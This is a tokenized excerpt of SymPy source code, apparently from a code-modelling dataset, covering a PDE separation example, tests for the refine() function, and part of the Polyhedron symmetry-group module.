( eq , Xi ( r , phi , theta ) , [ R ( r ) , u ( phi , theta ) ] ) <EOL> pprint ( res_r ) <EOL> pprint ( "<STR_LIT>" ) <EOL> res_theta = pde_separate ( eq , Xi ( r , phi , theta ) , [ Theta ( theta ) , u ( r , phi ) ] ) <EOL> pprint ( res_theta ) <EOL> res_phi = pde_separate ( eq , Xi ( r , phi , theta ) , [ Phi ( phi ) , u ( r , theta ) ] ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( "<STR_LIT>" % res_phi ) <EOL> pprint ( "<STR_LIT>" ) <EOL> eq_theta = Eq ( res_theta [ <NUM_LIT:0> ] , - C1 ) <EOL> pprint ( eq_theta ) <EOL> pprint ( "<STR_LIT>" ) <EOL> eq_left = Eq ( res_theta [ <NUM_LIT:1> ] , - C1 ) <EOL> pprint ( eq_left ) <EOL> pprint ( "<STR_LIT>" ) <EOL> res_theta = pde_separate ( eq_left , u ( r , phi ) , [ Phi ( phi ) , R ( r ) ] ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( res_theta ) <EOL> pprint ( "<STR_LIT>" ) <EOL> pprint ( eq_theta ) <EOL> pprint ( Eq ( res_theta [ <NUM_LIT:0> ] , C2 ) ) <EOL> pprint ( Eq ( res_theta [ <NUM_LIT:1> ] , C2 ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from sympy import ( Abs , exp , Expr , I , pi , Q , Rational , refine , S , sqrt , <EOL> atan , atan2 , nan , Symbol ) <EOL> from sympy . abc import x , y , z <EOL> from sympy . core . relational import Eq , Ne <EOL> from sympy . functions . elementary . piecewise import Piecewise <EOL> def test_Abs ( ) : <EOL> assert refine ( Abs ( x ) , Q . positive ( x ) ) == x <EOL> assert refine ( <NUM_LIT:1> + Abs ( x ) , Q . positive ( x ) ) == <NUM_LIT:1> + x <EOL> assert refine ( Abs ( x ) , Q . negative ( x ) ) == - x <EOL> assert refine ( <NUM_LIT:1> + Abs ( x ) , Q . negative ( x ) ) == <NUM_LIT:1> - x <EOL> assert refine ( Abs ( x ** <NUM_LIT:2> ) ) != x ** <NUM_LIT:2> <EOL> assert refine ( Abs ( x ** <NUM_LIT:2> ) , Q . real ( x ) ) == x ** <NUM_LIT:2> <EOL> def test_pow ( ) : <EOL> assert refine ( ( - <NUM_LIT:1> ) ** x , Q . even ( x ) ) == <NUM_LIT:1> <EOL> assert refine ( ( - <NUM_LIT:1> ) ** x , Q . odd ( x ) ) == - <NUM_LIT:1> <EOL> assert refine ( ( - <NUM_LIT:2> ) ** x , Q . even ( x ) ) == <NUM_LIT:2> ** x <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) ) != Abs ( x ) <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) , Q . complex ( x ) ) != Abs ( x ) <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) , Q . real ( x ) ) == Abs ( x ) <EOL> assert refine ( sqrt ( x ** <NUM_LIT:2> ) , Q . positive ( x ) ) == x <EOL> assert refine ( ( x ** <NUM_LIT:3> ) ** ( S ( <NUM_LIT:1> ) / <NUM_LIT:3> ) ) != x <EOL> assert refine ( ( x ** <NUM_LIT:3> ) ** ( S ( <NUM_LIT:1> ) / <NUM_LIT:3> ) , Q . real ( x ) ) != x <EOL> assert refine ( ( x ** <NUM_LIT:3> ) ** ( S ( <NUM_LIT:1> ) / <NUM_LIT:3> ) , Q . positive ( x ) ) == x <EOL> assert refine ( sqrt ( <NUM_LIT:1> / x ) , Q . real ( x ) ) != <NUM_LIT:1> / sqrt ( x ) <EOL> assert refine ( sqrt ( <NUM_LIT:1> / x ) , Q . positive ( x ) ) == <NUM_LIT:1> / sqrt ( x ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y ) , Q . even ( x ) ) == ( - <NUM_LIT:1> ) ** y <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y + z ) , Q . odd ( x ) & Q . odd ( z ) ) == ( - <NUM_LIT:1> ) ** y <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y + <NUM_LIT:1> ) , Q . odd ( x ) ) == ( - <NUM_LIT:1> ) ** y <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + y + <NUM_LIT:2> ) , Q . odd ( x ) ) == ( - <NUM_LIT:1> ) ** ( y + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:3> ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> - S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** x <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> + S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> + <NUM_LIT:5> * S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> - <NUM_LIT:7> * S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** ( x + <NUM_LIT:1> ) <EOL> assert refine ( ( - <NUM_LIT:1> ) ** ( ( - <NUM_LIT:1> ) ** x / <NUM_LIT:2> - <NUM_LIT:9> * S . Half ) , Q . integer ( x ) ) == ( - <NUM_LIT:1> ) ** x <EOL> assert refine ( Abs ( x ) ** <NUM_LIT:2> , Q . real ( x ) ) == x ** <NUM_LIT:2> <EOL> assert refine ( Abs ( x ) ** <NUM_LIT:3> , Q . real ( x ) ) == Abs ( x ) ** <NUM_LIT:3> <EOL> assert refine ( Abs ( x ) ** <NUM_LIT:2> ) == Abs ( x ) ** <NUM_LIT:2> <EOL> def test_exp ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' , integer = True ) <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * x ) ) == <NUM_LIT:1> <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * ( x + Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) ) ) ) == - <NUM_LIT:1> <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * ( x + Rational ( <NUM_LIT:1> , <NUM_LIT:4> ) ) ) ) == I <EOL> assert refine ( exp ( pi * I * <NUM_LIT:2> * ( x + Rational ( <NUM_LIT:3> , <NUM_LIT:4> ) ) ) ) == - I <EOL> def test_Relational ( ) : <EOL> assert not refine ( x < <NUM_LIT:0> , ~ Q . is_true ( x < <NUM_LIT:0> ) ) <EOL> assert refine ( x < <NUM_LIT:0> , Q . is_true ( x < <NUM_LIT:0> ) ) <EOL> assert refine ( x < <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> > x ) ) == True <EOL> assert refine ( x < <NUM_LIT:0> , Q . is_true ( y < <NUM_LIT:0> ) ) == ( x < <NUM_LIT:0> ) <EOL> assert not refine ( x <= <NUM_LIT:0> , ~ Q . is_true ( x <= <NUM_LIT:0> ) ) <EOL> assert refine ( x <= <NUM_LIT:0> , Q . is_true ( x <= <NUM_LIT:0> ) ) <EOL> assert refine ( x <= <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> >= x ) ) == True <EOL> assert refine ( x <= <NUM_LIT:0> , Q . is_true ( y <= <NUM_LIT:0> ) ) == ( x <= <NUM_LIT:0> ) <EOL> assert not refine ( x > <NUM_LIT:0> , ~ Q . is_true ( x > <NUM_LIT:0> ) ) <EOL> assert refine ( x > <NUM_LIT:0> , Q . is_true ( x > <NUM_LIT:0> ) ) <EOL> assert refine ( x > <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> < x ) ) == True <EOL> assert refine ( x > <NUM_LIT:0> , Q . is_true ( y > <NUM_LIT:0> ) ) == ( x > <NUM_LIT:0> ) <EOL> assert not refine ( x >= <NUM_LIT:0> , ~ Q . is_true ( x >= <NUM_LIT:0> ) ) <EOL> assert refine ( x >= <NUM_LIT:0> , Q . is_true ( x >= <NUM_LIT:0> ) ) <EOL> assert refine ( x >= <NUM_LIT:0> , Q . is_true ( <NUM_LIT:0> <= x ) ) == True <EOL> assert refine ( x >= <NUM_LIT:0> , Q . is_true ( y >= <NUM_LIT:0> ) ) == ( x >= <NUM_LIT:0> ) <EOL> assert not refine ( Eq ( x , <NUM_LIT:0> ) , ~ Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Eq ( x , <NUM_LIT:0> ) , Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Eq ( x , <NUM_LIT:0> ) , Q . is_true ( Eq ( <NUM_LIT:0> , x ) ) ) == True <EOL> assert refine ( Eq ( x , <NUM_LIT:0> ) , Q . is_true ( Eq ( y , <NUM_LIT:0> ) ) ) == Eq ( x , <NUM_LIT:0> ) <EOL> assert not refine ( Ne ( x , <NUM_LIT:0> ) , ~ Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Ne ( x , <NUM_LIT:0> ) , Q . is_true ( Ne ( <NUM_LIT:0> , x ) ) ) == True <EOL> assert refine ( Ne ( x , <NUM_LIT:0> ) , Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) <EOL> assert refine ( Ne ( x , <NUM_LIT:0> ) , Q . is_true ( Ne ( y , <NUM_LIT:0> ) ) ) == ( Ne ( x , <NUM_LIT:0> ) ) <EOL> def test_Piecewise ( ) : <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x < <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x < <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y < <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x < <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x > <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x > <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y > <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x <= <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x <= <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y <= <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x <= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( x >= <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( x >= <NUM_LIT:0> ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( y >= <NUM_LIT:0> ) ) == Piecewise ( ( <NUM_LIT:1> , x >= <NUM_LIT:0> ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Eq ( <NUM_LIT:0> , x ) ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( Eq ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( Eq ( <NUM_LIT:0> , x ) ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Eq ( y , <NUM_LIT:0> ) ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:1> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , ~ Q . is_true ( Ne ( x , <NUM_LIT:0> ) ) ) == <NUM_LIT:3> <EOL> assert refine ( Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) , Q . is_true ( Ne ( y , <NUM_LIT:0> ) ) ) == Piecewise ( ( <NUM_LIT:1> , Ne ( x , <NUM_LIT:0> ) ) , ( <NUM_LIT:3> , True ) ) <EOL> def test_atan2 ( ) : <EOL> assert refine ( atan2 ( y , x ) , Q . real ( y ) & Q . positive ( x ) ) == atan ( y / x ) <EOL> assert refine ( atan2 ( y , x ) , Q . negative ( y ) & Q . positive ( x ) ) == atan ( y / x ) <EOL> assert refine ( atan2 ( y , x ) , Q . negative ( y ) & Q . negative ( x ) ) == atan ( y / x ) - pi <EOL> assert refine ( atan2 ( y , x ) , Q . positive ( y ) & Q . negative ( x ) ) == atan ( y / x ) + pi <EOL> assert refine ( atan2 ( y , x ) , Q . zero ( y ) & Q . negative ( x ) ) == pi <EOL> assert refine ( atan2 ( y , x ) , Q . positive ( y ) & Q . zero ( x ) ) == pi / <NUM_LIT:2> <EOL> assert refine ( atan2 ( y , x ) , Q . negative ( y ) & Q . zero ( x ) ) == - pi / <NUM_LIT:2> <EOL> assert refine ( atan2 ( y , x ) , Q . zero ( y ) & Q . zero ( x ) ) == nan <EOL> def test_func_args ( ) : <EOL> class MyClass ( Expr ) : <EOL> def __init__ ( self , * args ) : <EOL> self . my_member = "<STR_LIT>" <EOL> @ property <EOL> def func ( self ) : <EOL> def my_func ( * args ) : <EOL> obj = MyClass ( * args ) <EOL> obj . my_member = self . my_member <EOL> return obj <EOL> return my_func <EOL> x = MyClass ( ) <EOL> x . my_member = "<STR_LIT>" <EOL> assert x . my_member == refine ( x ) . my_member <EOL> def test_eval_refine ( ) : <EOL> from sympy . core . expr import Expr <EOL> class MockExpr ( Expr ) : <EOL> def _eval_refine ( self , assumptions ) : <EOL> return True <EOL> mock_obj = MockExpr ( ) <EOL> assert refine ( mock_obj ) </s>
<s> from __future__ import print_function , division <EOL> from sympy . core import Basic , Tuple <EOL> from sympy . sets import FiniteSet <EOL> from sympy . core . compatibility import as_int , range <EOL> from sympy . combinatorics import Permutation as Perm <EOL> from sympy . combinatorics . perm_groups import PermutationGroup <EOL> from sympy . utilities . iterables import ( minlex , unflatten , flatten ) <EOL> rmul = Perm . rmul <EOL> class Polyhedron ( Basic ) : <EOL> """<STR_LIT>""" <EOL> _edges = None <EOL> def __new__ ( cls , corners , faces = [ ] , pgroup = [ ] ) : <EOL> """<STR_LIT>""" <EOL> faces = [ minlex ( f , directed = False , is_set = True ) for f in faces ] <EOL> corners , faces , pgroup = args = [ Tuple ( * a ) for a in ( corners , faces , pgroup ) ] <EOL> obj = Basic . __new__ ( cls , * args ) <EOL> obj . _corners = tuple ( corners ) <EOL> obj . _faces = FiniteSet ( * faces ) <EOL> if pgroup and pgroup [ <NUM_LIT:0> ] . size != len ( corners ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> obj . _pgroup = PermutationGroup ( ( <EOL> pgroup or [ Perm ( range ( len ( corners ) ) ) ] ) ) <EOL> return obj <EOL> @ property <EOL> def corners ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _corners <EOL> vertices = corners <EOL> @ property <EOL> def array_form ( self ) : <EOL> """<STR_LIT>""" <EOL> corners = list ( self . args [ <NUM_LIT:0> ] ) <EOL> return [ corners . index ( c ) for c in self . corners ] <EOL> @ property <EOL> def cyclic_form ( self ) : <EOL> """<STR_LIT>""" <EOL> return Perm . _af_new ( self . array_form ) . cyclic_form <EOL> @ property <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _corners ) <EOL> @ property <EOL> def faces ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _faces <EOL> @ property <EOL> def pgroup ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pgroup <EOL> @ property <EOL> def edges ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _edges is None : <EOL> output = set ( ) <EOL> for face in self . faces : <EOL> for i in range ( len ( face ) ) : <EOL> edge = tuple ( sorted ( [ face [ i ] , face [ i - <NUM_LIT:1> ] ] ) ) <EOL> output . add ( edge ) <EOL> self . _edges = FiniteSet ( * output ) <EOL> return self . _edges <EOL> def rotate ( self , perm ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( perm , Perm ) : <EOL> perm = self . pgroup [ perm ] <EOL> else : <EOL> if perm . size != self . size : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> a = perm . array_form <EOL> corners = [ self . corners [ a [ i ] ] for i in range ( len ( self . corners ) ) ] <EOL> self . _corners = tuple ( corners ) <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _corners = self . args [ <NUM_LIT:0> ] <EOL> def _pgroup_calcs ( ) : <EOL> """<STR_LIT>""" <EOL> def _pgroup_of_double ( polyh , ordered_faces , pgroup ) : <EOL> n = len ( ordered_faces [ <NUM_LIT:0> ] ) <EOL> fmap = dict ( zip ( ordered_faces , <EOL> range ( len ( ordered_faces ) ) ) ) <EOL> flat_faces = flatten ( ordered_faces ) <EOL> new_pgroup = [ ] <EOL> for i , p in enumerate ( pgroup ) : <EOL> h = polyh . copy ( ) <EOL> h . rotate ( p ) <EOL> c = h . corners <EOL> reorder = unflatten ( [ c [ j ] for j in flat_faces ] , n ) <EOL> reorder = [ tuple ( map ( as_int , <EOL> minlex ( f , directed = False , is_set = True ) ) ) <EOL> for f in reorder ] <EOL> new_pgroup . append ( Perm ( [ fmap [ f ] for f in reorder ] ) ) <EOL> return new_pgroup <EOL> tetrahedron_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ] <EOL> _t_pgroup = [ <EOL> Perm ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:0> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ] , [ <NUM_LIT:1> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:3> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:3> ] , [ <NUM_LIT:1> , <NUM_LIT:2> ] ] ) , <EOL> ] <EOL> tetrahedron = Polyhedron ( <EOL> range ( <NUM_LIT:4> ) , <EOL> tetrahedron_faces , <EOL> _t_pgroup ) <EOL> cube_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:4> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:5> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:6> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) , <EOL> ] <EOL> _c_pgroup = [ Perm ( p ) for p in <EOL> [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> ] ] <EOL> cube = Polyhedron ( <EOL> range ( <NUM_LIT:8> ) , <EOL> cube_faces , <EOL> _c_pgroup ) <EOL> octahedron_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) , ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) , <EOL> ] <EOL> octahedron = Polyhedron ( <EOL> range ( <NUM_LIT:6> ) , <EOL> octahedron_faces , <EOL> _pgroup_of_double ( cube , cube_faces , _c_pgroup ) ) <EOL> dodecahedron_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:12> , <NUM_LIT:7> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:5> ) , <EOL> ( <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> ) , ( <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:11> ) , ( <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT:12> ) , <EOL> ( <NUM_LIT:8> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> ] <EOL> def _string_to_perm ( s ) : <EOL> rv = [ Perm ( range ( <NUM_LIT:20> ) ) ] <EOL> p = None <EOL> for si in s : <EOL> if si not in '<STR_LIT>' : <EOL> count = int ( si ) - <NUM_LIT:1> <EOL> else : <EOL> count = <NUM_LIT:1> <EOL> if si == '<STR_LIT:0>' : <EOL> p = _f0 <EOL> elif si == '<STR_LIT:1>' : <EOL> p = _f1 <EOL> rv . extend ( [ p ] * count ) <EOL> return Perm . rmul ( * rv ) <EOL> _f0 = Perm ( [ <EOL> <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:5> , <NUM_LIT:11> , <EOL> <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> ] ) <EOL> _f1 = Perm ( [ <EOL> <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:15> , <EOL> <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:7> , <NUM_LIT:12> , <NUM_LIT> ] ) <EOL> _dodeca_pgroup = [ _f0 , _f1 ] + [ _string_to_perm ( s ) for s in '''<STR_LIT>''' . strip ( ) . split ( ) ] <EOL> dodecahedron = Polyhedron ( <EOL> range ( <NUM_LIT:20> ) , <EOL> dodecahedron_faces , <EOL> _dodeca_pgroup ) <EOL> icosahedron_faces = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> ] , [ <NUM_LIT:0> 